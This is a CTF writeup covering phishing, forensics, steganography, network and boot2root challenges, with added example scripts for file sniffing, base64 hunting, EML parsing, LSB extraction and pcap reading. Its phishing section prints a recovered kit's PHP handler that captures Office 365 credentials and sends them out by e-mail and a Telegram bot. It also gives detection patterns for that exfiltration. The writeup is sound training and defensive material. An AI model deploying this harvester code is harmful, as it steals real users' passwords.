# Digital Dragon CTFs
## Solved by Raviel
### Misc
#### Phising-1

The challenge gave us a link leading to a website.

After messing around I found that when I log in with Gmail it sends me back to google.com.
After checking its subfolders/paths with Dirsearch I found a backup folder.


Downloading the onedrive.zip file, we get its source code:
```php
<?php
include '../email.php';
// Generate a unique session data
$data = base64_encode(time() . sha1($_SERVER['REMOTE_ADDR'] . $_SERVER['HTTP_USER_AGENT']) . md5(uniqid(rand(), true)));
$_SESSION['data'] = $data;
// Prepare form data
$form = "**Office 365 Login Attempt**\n";
$form .= "| Username: " . $_POST['email'] . "\n";
$form .= "| Password: " . $_POST['password'] . "\n";
$form .= "| User IP: " . $_SERVER['REMOTE_ADDR'] . "\n";
$form .= "| Browser: " . $_SERVER['HTTP_USER_AGENT'] . "\n";
$form .= "| DateTime: " . date('Y-m-d H:i:s') . "\n";
$form .= "----------------------------------------\n";
// Prepare email details
$subject = "**Office 365 Login Attempt** From " . $_SERVER['REMOTE_ADDR'];
$headers = "From: Digital Dragons 2024 <your-email@example.com>\r\n";
$headers .= "MIME-Version: 1.0\r\n";
$headers .= "Content-Type: text/plain; charset=UTF-8\r\n";
// Send email to each recipient in $email array
foreach ($email as $recipient) {
    mail($recipient, $subject, $form, $headers);
}
// Send form data to Telegram
$data = [
    'chat_id' => $telegramID,
    'text' => $form
];
$response = file_get_contents("https://api.telegram.org/bot$telegramTOKEN/sendMessage?" . http_build_query($data));
// Redirect or display success message after processing
header(""); // Replace with your success page URL
exit();
?>
```
We can see that it sends the victim's information back through a Telegram bot using an API token.

Checking the token, we get the flag in email.php.
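To show what a defender pulls out of a kit like this, here is an added triage script (my example, not part of the writeup or of the challenge files). It scans PHP source, line by line, for the exfiltration patterns visible in the handler above: password fields read from `$_POST`, victim fingerprinting via `$_SERVER`, `mail()`, the Telegram bot endpoint, outbound HTTP calls, the redirect to a real site, and the config include. The rule names, the regexes and the embedded kit fragment are constructed for illustration; the fragment mirrors the shape of the code above but is not the challenge file.

```python
import re

# Constructed sample shaped like the kit's POST handler above (not the challenge file itself).
SAMPLE_KIT = r'''<?php
include '../email.php';
$form = "**Office 365 Login Attempt**\n";
$form .= "| Username: " . $_POST['email'] . "\n";
$form .= "| Password: " . $_POST['password'] . "\n";
$form .= "| User IP: " . $_SERVER['REMOTE_ADDR'] . "\n";
foreach ($email as $recipient) {
    mail($recipient, $subject, $form, $headers);
}
$response = file_get_contents("https://api.telegram.org/bot$telegramTOKEN/sendMessage?" . http_build_query($data));
header("Location: https://example.com/");
?>'''

# Each rule: (name, regex applied per line, why a defender cares). Names are my own labels.
RULES = [
    ("credential_capture", r"\$_POST\[\s*['\"](?:pass(?:word|wd)?|pwd)['\"]\s*\]",
     "reads a submitted password field"),
    ("victim_fingerprint", r"\$_SERVER\[\s*['\"](?:REMOTE_ADDR|HTTP_USER_AGENT)['\"]\s*\]",
     "records victim IP / user agent"),
    ("mail_exfil", r"\bmail\s*\(", "sends captured data by e-mail"),
    ("telegram_exfil", r"api\.telegram\.org/bot", "posts captured data to a Telegram bot"),
    ("outbound_http", r"\b(?:file_get_contents|curl_exec|curl_init)\s*\(\s*['\"]https?://",
     "makes an outbound HTTP request from the server"),
    ("redirect_to_real_site", r"\bheader\s*\(\s*['\"](?:Location:\s*)?https?://[^'\"]+['\"]",
     "bounces the victim to a legitimate site after capture"),
    ("config_include", r"\binclude(?:_once)?\s+['\"][^'\"]+['\"]",
     "pulls recipients / tokens from another file (worth collecting too)"),
]

def triage(source: str):
    """Return (rule, line_no, stripped_line, note) for every rule that fires on a line."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        for name, pattern, note in RULES:
            if re.search(pattern, line):
                findings.append((name, lineno, line.strip(), note))
    return findings

def exfil_channels(findings):
    """Sorted names of the exfiltration channels the kit uses."""
    channels = {"mail_exfil", "telegram_exfil", "outbound_http"}
    return sorted({f[0] for f in findings if f[0] in channels})

if __name__ == "__main__":
    for name, lineno, line, note in triage(SAMPLE_KIT):
        print(f"L{lineno:<3} {name:<22} {note}\n      {line}")
    print("channels:", exfil_channels(triage(SAMPLE_KIT)))
```

The output lists where the kit reads credentials and where it ships them; in an incident the `config_include` hit is the pointer to the file holding the recipient list and bot token, which is exactly where this writeup found its flag.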

**flag{227de24c5e70d582e1cfecb1c57105ff}**

---
### Forensics
#### Forensics-101

The challenge gave us an executable file, but it seemed not to have the right extension or format. Checking it with `file` in Linux we see that it is a PNG image, so just change the extension back and get the flag.
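`file` decides from the leading bytes, not from the extension. As an added example (mine, not from the writeup), here is a small Python sniffer that does the same for a handful of signatures and flags a mismatch between the declared extension and the sniffed type. The signature table is a subset chosen for illustration, and the sample bytes are a constructed PNG header handed out as an `.exe`, like the challenge file.

```python
# Leading-byte signatures (subset for illustration). Order matters only where prefixes overlap.
MAGIC = [
    (b"\x89PNG\r\n\x1a\n", "png"),
    (b"\xff\xd8\xff", "jpeg"),
    (b"GIF87a", "gif"),
    (b"GIF89a", "gif"),
    (b"%PDF-", "pdf"),
    (b"PK\x03\x04", "zip"),
    (b"\x7fELF", "elf"),
    (b"MZ", "exe"),
    (b"RIFF", "riff"),   # container; refined by the form type at offset 8
]

# Which sniffed kinds are legitimate for a declared extension
EXT_KINDS = {
    "png": {"png"}, "jpg": {"jpeg"}, "jpeg": {"jpeg"}, "gif": {"gif"},
    "pdf": {"pdf"}, "zip": {"zip"}, "docx": {"zip"}, "jar": {"zip"},
    "exe": {"exe"}, "dll": {"exe"}, "wav": {"wav"}, "avi": {"avi"},
}

def sniff(data: bytes) -> str:
    """Identify a blob by its signature; 'unknown' when nothing in MAGIC matches."""
    for sig, kind in MAGIC:
        if data.startswith(sig):
            if kind == "riff":
                return {b"WAVE": "wav", b"AVI ": "avi"}.get(data[8:12], "riff")
            return kind
    return "unknown"

def check(name: str, data: bytes):
    """Return (declared_ext, sniffed_kind, mismatch). Unknown kinds never count as a mismatch."""
    ext = name.rsplit(".", 1)[1].lower() if "." in name else ""
    kind = sniff(data)
    expected = EXT_KINDS.get(ext)
    mismatch = expected is not None and kind != "unknown" and kind not in expected
    return ext, kind, mismatch

# Constructed sample: a PNG signature plus the start of an IHDR chunk, named as an executable
FAKE_EXE = b"\x89PNG\r\n\x1a\n" + b"\x00\x00\x00\x0dIHDR" + b"\x00" * 13

if __name__ == "__main__":
    ext, kind, mismatch = check("challenge.exe", FAKE_EXE)
    print(f"declared .{ext}, looks like {kind}, mismatch={mismatch}")
```

On a real triage box you would read the first 16 bytes of each file with `open(path, "rb").read(16)` and feed them to `check`; anything reported as a mismatch gets the extension its bytes say it should have.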

**Flag: flag{6203b09fa1b624c6aa627d6108544686}**
#### Log flood

The challenge gave us an ISO file; extracting it, there are a lot of folders and log files.

The best way to solve this is to unzip it all, then `strings` and `grep`, or you can read it, but it will be an enormous amount of text.


You will see a suspicious Base64 string; decode it and get the flag.
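An added Python version of the strings-and-grep step (my example, not the writeup's tooling): it pulls base64-looking tokens out of log lines, tolerates stripped padding, decodes them, keeps only tokens that decode to mostly printable text, and reports those containing a marker. The log lines are constructed; the payload token is built from the constructed string `flag{constructed_example}` so the block runs offline, and the marker `flag{` is just the pattern this CTF uses.

```python
import base64
import binascii
import re
import string

# Runs of base64 alphabet, 16+ chars, with optional padding, not glued to other alphabet chars
B64_TOKEN = re.compile(r"(?<![A-Za-z0-9+/])[A-Za-z0-9+/]{16,}={0,2}(?![A-Za-z0-9+/])")
PRINTABLE = frozenset(string.printable.encode())

# Constructed log lines (not from the challenge ISO)
SAMPLE_LOGS = [
    "2024-05-01T10:00:01Z sshd[812]: Accepted publickey for deploy from 10.0.0.5 port 51234",
    "2024-05-01T10:00:07Z app[991]: session=5f2c9e1b7a3d4c8e9f0a1b2c3d4e5f60 user=alice",
    "2024-05-01T10:00:09Z cron[100]: job=backup payload="
    + base64.b64encode(b"flag{constructed_example}").decode(),
    "2024-05-01T10:00:12Z app[991]: token=dGhpcyBpcyBqdXN0IG5vaXNl rc=0",
]

def try_decode(token: str):
    """Decode a candidate token; None if it is not valid base64 or decodes to binary junk."""
    padded = token + "=" * (-len(token) % 4)          # restore padding if it was stripped
    try:
        raw = base64.b64decode(padded, validate=True)
    except (binascii.Error, ValueError):
        return None
    if not raw:
        return None
    printable = sum(b in PRINTABLE for b in raw)
    return raw if printable / len(raw) >= 0.9 else None

def hunt(lines, marker=b"flag{"):
    """Return (line_no, token, decoded_text) for decodable tokens; marker=None keeps all of them."""
    hits = []
    for n, line in enumerate(lines, 1):
        for m in B64_TOKEN.finditer(line):
            raw = try_decode(m.group(0))
            if raw is None:
                continue
            if marker is None or marker in raw:
                hits.append((n, m.group(0), raw.decode("ascii", "replace")))
    return hits

if __name__ == "__main__":
    for n, token, text in hunt(SAMPLE_LOGS, marker=None):
        print(f"line {n}: {token} -> {text!r}")
```

Running it with `marker=None` shows why the printable filter matters: hex session ids and similar noise are valid base64 alphabet but decode to garbage, while the real payload and the decoy token both come back readable. For a whole extracted ISO, feed it the output of `strings -n 16` over every file instead of `SAMPLE_LOGS`.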

**Flag: flag{ab0d215c26354bfe02302c3beac879bf}**
#### Email
**SORRY, I DON'T HAVE THE CHALLENGE DESCRIPTION FOR THIS BECAUSE I DIDN'T CAPTURE IT WHEN SOLVING AND THE WEBSITE HAS ALREADY CLOSED**

The challenge gave us an EML file, so I will open it with Thunderbird.

After messing around with the PDF file, it's a corrupted file, or it may be full of garbage inside.

But do you remember the flag base64-encoded? It's "ZmxhZw". Does it look familiar? It's in the picture right at the end of the EML file.
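Spotting `ZmxhZw` in the raw message works only when `flag` starts at a 3-byte-aligned offset inside the attachment; shifted by one or two bytes, the same plaintext encodes to completely different characters. As an added example (mine, not from the writeup), the block below builds a constructed EML with a junk "PDF" and a PNG-looking image that carries the marker, walks the MIME parts with the standard library, decodes each part's transfer encoding, and searches the decoded bytes, which is alignment-independent. It also reports whether the encoded prefix was visible in the raw file, as the writeup observed. The addresses, filenames and payloads are all constructed.

```python
import base64
from email import message_from_bytes, policy
from email.message import EmailMessage

def build_sample_eml() -> bytes:
    """Constructed message: a junk 'PDF' plus a PNG-looking image whose bytes hold the marker."""
    msg = EmailMessage()
    msg["From"] = "sender@example.com"
    msg["To"] = "victim@example.com"
    msg["Subject"] = "Invoice attached"
    msg.set_content("Please see the attached files.")
    msg.add_attachment(b"%PDF-1.4\n" + b"\xff" * 60, maintype="application",
                       subtype="pdf", filename="invoice.pdf")
    # 8-byte PNG signature + 16 zero bytes = 24 bytes, so the marker starts 3-byte aligned
    # and its base64 form "Zmxh..." is visible in the raw file, as in the challenge.
    msg.add_attachment(b"\x89PNG\r\n\x1a\n" + b"\x00" * 16 + b"flag{constructed_example}",
                       maintype="image", subtype="png", filename="logo.png")
    return msg.as_bytes()

def walk_parts(raw: bytes):
    """[(filename, content_type, transfer_encoding, decoded_payload)] for every leaf part."""
    msg = message_from_bytes(raw, policy=policy.default)
    out = []
    for part in msg.walk():
        if part.is_multipart():
            continue                       # containers carry no payload of their own
        out.append((part.get_filename(), part.get_content_type(),
                    (part.get("Content-Transfer-Encoding") or "").lower(),
                    part.get_payload(decode=True) or b""))   # decode=True undoes base64/QP
    return out

def find_marker(raw: bytes, marker: bytes = b"flag{"):
    """Parts whose decoded bytes contain marker, plus whether its base64 form shows up raw."""
    hits = [(name, ctype) for name, ctype, _cte, payload in walk_parts(raw) if marker in payload]
    encoded_prefix = base64.b64encode(marker[:3])   # b"fla" -> b"Zmxh"; only visible when aligned
    return hits, encoded_prefix in raw

if __name__ == "__main__":
    raw = build_sample_eml()
    for name, ctype, cte, payload in walk_parts(raw):
        print(f"{name!s:<14} {ctype:<16} {cte:<7} {len(payload)} bytes, head={payload[:8]!r}")
    print(find_marker(raw))
```

For a real `.eml`, replace `build_sample_eml()` with `open(path, "rb").read()`. Searching decoded payloads finds the marker whether or not the raw base64 happens to line up, and the per-part listing (declared type, transfer encoding, first bytes) is the quick way to see that a "PDF" does not start with `%PDF-`.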


**Flag: flag{743cd9316bb1ded417574643e3839737}**

---
### Steganography
#### Steg-basic


The challenge gave us a JPG picture; run `strings` on it and get the flag.

**Flag: flag{b666cd2bbfe773ea854948d9b77953ac}**
#### Steg-revised

The challenge gave us a WAV file and a hint that it relates to LSB, so I will check the file with the SilentEye tool.

It returns nothing, so I will have to write a script to decode it:
```python
import wave

# Open the carrier and pull every sample byte out of it
with wave.open("stego_audio_LSB.wav", mode='rb') as song:
    frame_bytes = bytearray(song.readframes(song.getnframes()))

# Extract the LSB of each byte
extracted = [frame_bytes[i] & 1 for i in range(len(frame_bytes))]
# Pack the bits back into characters, 8 bits per byte, most significant bit first
string = "".join(chr(int("".join(map(str, extracted[i:i+8])), 2)) for i in range(0, len(extracted), 8))
# The hidden message ends with "###"; keep everything before it
decoded = string.split("###")[0]
print("decoded: " + decoded)
```
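The script above needs the challenge's WAV, so as an added, self-contained example (mine, not from the writeup) here is the whole round trip: a constructed 8-bit mono carrier, an embedder that writes the message bits into the sample LSBs followed by the same `###` terminator the writeup's script expects, and an extractor doing what the writeup's loop does. The carrier, the message and the `###` convention are assumptions of this example, not facts about the challenge file.

```python
import io
import random
import wave

def make_wav_bytes(n_frames: int = 4000, seed: int = 7) -> bytes:
    """Constructed 8-bit mono carrier of pseudo-random samples (stands in for real audio)."""
    rnd = random.Random(seed)
    buf = io.BytesIO()
    with wave.open(buf, "wb") as w:
        w.setnchannels(1)
        w.setsampwidth(1)          # one byte per sample, so one LSB per byte
        w.setframerate(8000)
        w.writeframes(bytes(rnd.randrange(256) for _ in range(n_frames)))
    return buf.getvalue()

def embed_lsb(wav_bytes: bytes, message: bytes, terminator: bytes = b"###") -> bytes:
    """Overwrite the LSB of the first len(message + terminator) * 8 sample bytes."""
    payload = message + terminator
    bits = [(byte >> (7 - k)) & 1 for byte in payload for k in range(8)]   # MSB first
    with wave.open(io.BytesIO(wav_bytes), "rb") as src:
        params = src.getparams()
        frames = bytearray(src.readframes(src.getnframes()))
    if len(bits) > len(frames):
        raise ValueError("carrier too small for message")
    for i, bit in enumerate(bits):
        frames[i] = (frames[i] & 0xFE) | bit
    out = io.BytesIO()
    with wave.open(out, "wb") as dst:
        dst.setparams(params)
        dst.writeframes(bytes(frames))
    return out.getvalue()

def extract_lsb(wav_bytes: bytes, terminator: bytes = b"###") -> bytes:
    """Collect the LSB of every sample byte, regroup into bytes, cut at the terminator."""
    with wave.open(io.BytesIO(wav_bytes), "rb") as src:
        frames = src.readframes(src.getnframes())
    bits = [b & 1 for b in frames]
    out = bytearray(int("".join(map(str, bits[i:i + 8])), 2) for i in range(0, len(bits) - 7, 8))
    return bytes(out).split(terminator)[0]

if __name__ == "__main__":
    carrier = make_wav_bytes()
    stego = embed_lsb(carrier, b"flag{constructed_example}")
    print("hidden  :", extract_lsb(stego))
    print("carrier :", extract_lsb(carrier)[:16], "(noise, no terminator found)")
```

One caveat the writeup's script glosses over: it takes the LSB of every byte, which is right for 8-bit samples. A 16-bit WAV stores each sample as two little-endian bytes, so "one bit per sample" embedders only touch the low byte and the extractor has to skip every second byte; if a 16-bit file yields garbage with the per-byte loop, that is the first thing to change.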

**Flag: flag{464cb8f40278b7aafc98d931e50a5021}**

---
### Networking
#### D1 Accidental Breach

The challenge gave us a pcap file containing 270 packets.

Going through the streams, eventually you will find a conversation that looks kinda suspicious.
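An added Python example (mine, not from the writeup) that does the "follow the stream" step without Wireshark: a minimal classic-pcap reader that groups TCP payloads per endpoint pair and lets you grep the conversations. The capture is constructed in memory (Ethernet/IPv4/TCP frames with zero checksums and documentation addresses), so the block runs offline; the reader handles only classic pcap with the Ethernet link type, assumes no IP fragmentation, and keeps capture order rather than reordering by sequence number.

```python
import socket
import struct

def _ipv4_tcp_frame(src: str, sport: int, dst: str, dport: int, payload: bytes) -> bytes:
    """Constructed Ethernet/IPv4/TCP frame; checksums are left zero (fine for offline parsing)."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, 0x18, 65535, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 1, 0, 64, 6, 0,
                     socket.inet_aton(src), socket.inet_aton(dst)) + tcp
    eth = bytes.fromhex("001122334455") + bytes.fromhex("66778899aabb") + b"\x08\x00"
    return eth + ip

def build_pcap(frames) -> bytes:
    """Little-endian classic pcap (magic a1b2c3d4, link type 1 = Ethernet)."""
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    for i, frame in enumerate(frames):
        out += struct.pack("<IIII", 1700000000 + i, 0, len(frame), len(frame)) + frame
    return out

# Constructed capture: one HTTP exchange plus a chat on an unusual port
SAMPLE_PCAP = build_pcap([
    _ipv4_tcp_frame("10.0.0.5", 51234, "198.51.100.7", 80, b"GET / HTTP/1.1\r\nHost: example.com\r\n\r\n"),
    _ipv4_tcp_frame("10.0.0.5", 40000, "10.0.0.9", 4444, b"hey, did you get the file?\n"),
    _ipv4_tcp_frame("10.0.0.9", 4444, "10.0.0.5", 40000, b"yes. flag{constructed_example}\n"),
    _ipv4_tcp_frame("198.51.100.7", 80, "10.0.0.5", 51234, b"HTTP/1.1 200 OK\r\n\r\n"),
])

def tcp_streams(pcap: bytes):
    """Map (endpoint, endpoint) -> [(direction, payload)] for every TCP segment carrying data."""
    magic = pcap[:4]
    if magic == b"\xd4\xc3\xb2\xa1":
        end = "<"
    elif magic == b"\xa1\xb2\xc3\xd4":
        end = ">"
    else:
        raise ValueError("not a classic pcap file")
    if struct.unpack(end + "I", pcap[20:24])[0] != 1:
        raise ValueError("only Ethernet captures are handled here")
    streams, off = {}, 24
    while off + 16 <= len(pcap):
        _sec, _usec, incl, _orig = struct.unpack(end + "IIII", pcap[off:off + 16])
        frame = pcap[off + 16:off + 16 + incl]
        off += 16 + incl
        if len(frame) < 34 or frame[12:14] != b"\x08\x00":      # IPv4 only
            continue
        ip = frame[14:]
        ihl = (ip[0] & 0x0F) * 4
        total = struct.unpack("!H", ip[2:4])[0]
        if ip[9] != 6:                                           # TCP only
            continue
        src, dst = socket.inet_ntoa(ip[12:16]), socket.inet_ntoa(ip[16:20])
        tcp = ip[ihl:total]
        sport, dport = struct.unpack("!HH", tcp[:4])
        payload = tcp[(tcp[12] >> 4) * 4:]                       # skip TCP header + options
        if not payload:
            continue
        key = tuple(sorted([(src, sport), (dst, dport)]))        # same key for both directions
        streams.setdefault(key, []).append((f"{src}:{sport} -> {dst}:{dport}", payload))
    return streams

def render(stream) -> str:
    """Text view of one conversation, one line per segment."""
    return "\n".join(f"{tag}: {payload.decode('utf-8', 'replace').rstrip()}" for tag, payload in stream)

def grep_streams(streams, needle: str):
    """Keys of conversations whose text contains needle (case-insensitive)."""
    return [k for k, s in streams.items() if needle.lower() in render(s).lower()]

if __name__ == "__main__":
    streams = tcp_streams(SAMPLE_PCAP)
    for key in grep_streams(streams, "flag{"):
        print(key, "\n" + render(streams[key]))
```

For the challenge file, replace `SAMPLE_PCAP` with `open("capture.pcap", "rb").read()`; pcapng captures need converting first (for example with `editcap`), since the magic check rejects them on purpose rather than misparsing.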


**Flag: flag{f88e05cbd53f00f6090be0e153680b2e}**

->***I won't be writing up the first challenge because it just asks what "IoC" means lmao***<-

---
### Boot2Root
#### BRT-1
**AGAIN, I'M SORRY BECAUSE I DON'T HAVE THE CHALLENGE DESCRIPTION**

The challenge gave us an OVA file. Opening it in VMware you can boot up the VM, but there's no password or account; there are 2 ways to solve this challenge.

First, we would have to climb to root, but in this case, because the challenge gave us the whole VM, there is a forensics way to solve it using FTK Imager.

Add the vmdk file as image evidence and there we go.

Dig a little deeper and you will find the flag.

**Flag: flag{2991c9c5a7e497203de318897dbf1970}**

**By the way, shout-out to AnhShidou for this unintended solve**

**Thanks for reading (')>**